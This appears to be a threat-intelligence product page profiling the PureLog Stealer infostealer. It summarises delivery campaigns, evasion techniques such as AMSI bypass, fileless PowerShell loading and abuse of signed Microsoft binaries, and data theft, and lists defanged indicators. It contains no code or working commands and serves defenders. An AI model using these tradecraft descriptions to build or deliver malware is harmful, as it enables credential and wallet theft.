PureLog Stealer is an information-stealing malware family used in multiple phishing and loader-driven campaigns. The provided reporting describes it as a low-cost, easy-to-use infostealer that steals saved browser passwords, cookies, autofill data, browsing history, browser extension data, cryptocurrency wallet information, screenshots, and general system details such as hostname, username, and installed antivirus products. It has been observed establishing persistence via registry modifications, including HKCU\Run\SystemSettings, and exfiltrating collected data over HTTPS to command-and-control infrastructure.
Observed delivery methods include fake copyright-violation phishing notices, ClickFix/fake CAPTCHA social-engineering lures, and multi-stage commodity loader campaigns. In one campaign reported by Trend Micro, organizations in healthcare, government, education, and hospitality were targeted, with primary targeting in Germany and Canada and additional victims in the United States and Australia. That infection chain used localized phishing emails, compressed archives, a renamed legitimate tool such as WinRAR, a renamed Python interpreter, AMSI bypass, anti-VM and anti-analysis checks, remote retrieval of decryption keys, dual .NET loaders, and direct in-memory execution of the final payload. Another campaign documented by Securonix, named Veil#Drop, abused Google Blogspot pages, PowerShell, Windows Script Host, and trusted Microsoft-signed binaries such as InstallUtil, MSBuild, RegSvcs, and the C# compiler to stage and reflectively load PureLog Stealer while minimizing on-disk artifacts. Associated lure and staging artifacts in that campaign included transcript.pdf.js, phud.dudus.docx.pdf.olp.sys, niple.docx.odp.pdf.sys, and Blogspot infrastructure such as htlwub00klocate[.]blogspot[.]com and cpyzaramay26[.]blogspot[.]com.
PureLog Stealer also appeared as a final payload in sophisticated commodity-loader activity targeting manufacturing and government organizations in Italy, Finland, and Saudi Arabia. In that reporting, infection vectors included weaponized Office documents exploiting CVE-2017-11882, malicious SVG files, ZIP archives with LNK shortcuts, and RAR archives containing obfuscated JavaScript. Subsequent stages used hidden PowerShell, steganographically embedded payloads retrieved from Archive.org, reflective .NET loading, a trojanized TaskScheduler library, and process injection or hollowing into RegAsm.exe. In those campaigns, the PureLog payload was decrypted with Triple DES in CBC mode, with GZip decompression also reported, before exfiltrating browser credentials, cryptocurrency wallet data, and system information.
The malware is also referenced in ClickFix-related activity where victims are tricked into manually executing malicious PowerShell or Run-dialog commands copied from fake CAPTCHA pages; in at least one Swiss-targeting campaign, researchers assessed the delivered payload was likely AsyncRAT or PureLog Stealer based on observed command-and-control traffic. Across the provided content, PureLog Stealer is associated with financially motivated activity and was also listed in finance-sector incident reporting.
Mallory pivots from this family to the IOCs, detections, and named campaigns that touch your stack, and pages you when something new lands.
29 distinct techniques documented for this family, organized by ATT&CK tactic.
Once opened, the file runs through Windows Script Host and immediately launches PowerShell with security checks turned off. From there, PowerShell reaches out to attacker-controlled Blogspot pages to fetch the next stages, without saving a suspicious file to disk. | PowerShell then uses a download cradle, fetching code directly from a Blogspot page and running it from memory. Nothing is written to the hard drive at this stage, so many file scanning tools never inspect it.
Once the victim executes the malicious lure, a command interpreter launches silently in the background.
The extracted content includes a renamed Python interpreter called svchost.exe and a heavily obfuscated Python script named instructions.pdf.
niple.docx.odp.pdf.sys, carries two large blocks of encoded numeric data. These decode into working dot NET programs
A file named transcript.pdf.js looks like an ordinary PDF at first glance, but Windows treats it very differently behind the scenes. Since Windows often hides file extensions by default, victims see only transcript.pdf and have little reason to suspect anything is wrong.
This sets up the final deployment of the PureLog payload, which is executed directly in memory — again, leaving scarcely an artifact trail.
The retrieved file, named phud.dudus.docx.pdf.olp.sys, deletes the original JavaScript launcher to erase evidence
It also decrypts a hidden payload using a repeating XOR key.
If that approach fails, the malware falls back on trusted Microsoft signed tools such as InstallUtil, MSBuild, RegSvcs, and the C sharp compiler, blending in with activity that security software usually ignores.
Incident volume peaked in the middle period (25 events, March 10 to April 10), driven by the USD 280 million Drift heist and a surge in phishing and credential-theft campaigns targeting US-based financial institutions.
PureLog Stealer harvests whatever valuable data it can find, including saved browser passwords, cookies, autofill entries, browsing history, and cryptocurrency wallet details.
The script also takes a full-screen screenshot, collects the machine hostname, username, and installed antivirus product names...
7 indicators attributed across vendor reports, sandbox runs, and researcher write-ups. Full values are available in Mallory.
IPs, domains, and DNS infrastructure linked to this family.
Other indicator types observed in public reporting.
8 sources tracked across advisories, community write-ups, and news. New activity surfaces here as Mallory finds it.
An information stealer delivered through a multi-stage, memory-resident infection chain that abuses Blogspot, PowerShell, Windows Script Host, and trusted Microsoft utilities. It steals saved browser passwords, cookies, autofill data, browsing history, cryptocurrency wallet details, and basic system information.
A stealer delivered via copyright-themed phishing lures.
PureLog Stealer is an infostealer used in a phishing-driven campaign that harvests browser credentials, cryptocurrency wallet data, browser extension data, system information, screenshots, hostname, username, and installed antivirus details. In this campaign it is delivered through social engineering, decrypted and loaded in memory via .NET loaders, uses AMSI bypass techniques, and establishes registry persistence.
A low-cost infostealer delivered through a fileless phishing campaign. It executes in memory, establishes persistence via registry modifications, captures screenshots, profiles the system, and steals Chrome credentials, browser extensions, cryptocurrency wallets, and system information while using AMSI bypass, anti-VM, and obfuscation techniques to evade detection.
Match every observed IP, domain, and hash against your live telemetry.
Named campaigns wielding this family, with evidence pinned to each claim.
CVEs this family uses for access and lateral movement.
YARA, Sigma, Snort, and vendor rules, auto-deployed to your SIEM.
Every documented technique, ranked by evidence weight.
Reddit, Mastodon, and CTI community discussion around this family.